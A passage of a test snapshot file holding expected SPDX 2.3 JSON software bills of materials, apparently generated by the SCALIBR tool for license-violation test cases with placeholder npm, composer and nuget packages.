"sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "author1/mine1", "SPDXID": "SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the dotnet/packageslockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:nuget/mine1@1.3.5" } ] }, { "name": "author1/mine1", "SPDXID": "SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/no_sources - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_no_packages - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "5.9.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@5.9.0" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": 